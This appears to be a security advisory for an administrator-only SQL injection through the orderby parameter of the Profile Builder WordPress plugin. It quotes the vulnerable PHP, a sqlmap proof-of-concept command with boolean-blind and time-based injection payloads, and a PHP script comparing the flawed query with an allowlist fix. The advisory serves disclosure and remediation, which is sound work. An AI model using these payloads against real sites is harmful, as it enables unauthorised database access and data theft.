The orderby parameter of the wp-admin/users.php?page=unconfirmed_emails&orderby=email&order=asc page, which is available when the "Email confirmation" setting of the plugin is activated (it is off by default), is not properly sanitised and validated before being concatenated into a SQL statement, leading to an SQL injection. The value is passed through sanitize_text_field(), which strips HTML but does not neutralise SQL, and only the literal values username and email are mapped to column names; any other value reaches the ORDER BY clause unchanged. The issue is exploitable by high-privilege users such as administrators.
File: profile-builder/features/email-confirmation/class-email-confirmation.php (lines 319-321 and 345)

    /* handle order and orderby attr */
    if( !empty( $_REQUEST['orderby'] ) ){
        $orderby = sanitize_text_field( $_REQUEST['orderby'] );
        if( $orderby == 'username' )
            $orderby = 'user_login';
        elseif ( $orderby == 'email' )
            $orderby = 'user_email';
    } else
        $orderby = 'user_login';

    [...]

    $results = $wpdb->get_results("SELECT * FROM ".$wpdb->base_prefix."signups WHERE $where ORDER BY $orderby $order LIMIT $offset, $per_page");

Proof of concept with sqlmap (the cookie value is elided):

    python3 sqlmap.py -u "http://wptest.loc:82/wp-admin/users.php?orderby=email&page=unconfirmed_emails&order=asc" -p orderby --dbs --cookie="wordpres...."

    [...]
    sqlmap identified the following injection point(s) with a total of 225 HTTP(s) requests:
    ---
    Parameter: orderby (GET)
        Type: boolean-based blind
        Title: Boolean-based blind - Parameter replace (original value)
        Payload: page=unconfirmed_emails&orderby=(SELECT (CASE WHEN (9360=9360) THEN 0x656d61696c ELSE (SELECT 6316 UNION SELECT 3657) END))&order=asc

        Type: time-based blind
        Title: MySQL >= 5.0.12 time-based blind - Parameter replace
        Payload: page=unconfirmed_emails&orderby=(CASE WHEN (8207=8207) THEN SLEEP(5) ELSE 8207 END)&order=asc
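The quoted check maps only two values and lets everything else through to the statement. The script below is an added example, not code from the plugin or from the advisory; it reproduces that logic beside an allowlist rewrite in plain PHP so it can be run from the CLI without WordPress. The function names, the wp_signups table literal, the sanitize_text_field_stub() stand-in for WordPress's sanitize_text_field(), and the $where placeholder are assumptions made for the example.

```php
<?php
// Added example, not the plugin's code. Compares the plugin's ORDER BY
// handling (as quoted in the PoC) with an allowlist-based rewrite, using
// plain PHP so it runs from the CLI without WordPress. The table name
// wp_signups and the $where clause are placeholders; in the plugin they
// come from $wpdb->base_prefix and code not shown in the advisory.

// Stand-in for WordPress sanitize_text_field(): strips tags and trims.
// The real function also removes octets and line breaks, but none of
// that touches a payload made of parentheses, keywords and hex literals.
function sanitize_text_field_stub( string $value ): string {
    return trim( strip_tags( $value ) );
}

// Mirrors the vulnerable logic: only 'username' and 'email' are mapped,
// any other value is concatenated into the statement unchanged.
function signups_query_vulnerable( array $request, string $where, int $offset, int $per_page ): string {
    if ( ! empty( $request['orderby'] ) ) {
        $orderby = sanitize_text_field_stub( $request['orderby'] );
        if ( $orderby == 'username' ) {
            $orderby = 'user_login';
        } elseif ( $orderby == 'email' ) {
            $orderby = 'user_email';
        }
    } else {
        $orderby = 'user_login';
    }
    $order = $request['order'] ?? 'asc';
    return "SELECT * FROM wp_signups WHERE $where ORDER BY $orderby $order LIMIT $offset, $per_page";
}

// Hardened version: the request value is only ever used as a key into a
// fixed map, so the SQL identifier never comes from the client. The sort
// direction is reduced to one of two literals, and the LIMIT operands are
// formatted as integers (inside WordPress, use
// $wpdb->prepare( '... LIMIT %d, %d', $offset, $per_page ) for the same effect).
function signups_query_hardened( array $request, string $where, int $offset, int $per_page ): string {
    static $orderby_map = array(
        'username' => 'user_login',
        'email'    => 'user_email',
    );
    $key     = isset( $request['orderby'] ) ? (string) $request['orderby'] : '';
    $orderby = $orderby_map[ $key ] ?? 'user_login';
    $order   = ( strtolower( (string) ( $request['order'] ?? 'asc' ) ) === 'desc' ) ? 'DESC' : 'ASC';
    return sprintf(
        'SELECT * FROM wp_signups WHERE %s ORDER BY %s %s LIMIT %d, %d',
        $where, $orderby, $order, $offset, $per_page
    );
}

// Constructed request using the time-based payload from the sqlmap output above.
$request = array(
    'page'    => 'unconfirmed_emails',
    'orderby' => '(CASE WHEN (8207=8207) THEN SLEEP(5) ELSE 8207 END)',
    'order'   => 'asc',
);
$where = 'active = 0';   // placeholder; the plugin builds this separately

echo signups_query_vulnerable( $request, $where, 0, 20 ), PHP_EOL;
echo signups_query_hardened( $request, $where, 0, 20 ), PHP_EOL;
```

Run with php on the command line: the vulnerable builder returns the CASE ... SLEEP(5) expression verbatim inside the ORDER BY clause, while the hardened builder falls back to ORDER BY user_login ASC because the payload is not a key of the map. The rewrite also constrains the order value, since the quoted statement interpolates $order as well and the snippet does not show how that variable is derived.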
Lenon Leite
Yes
2020-12-02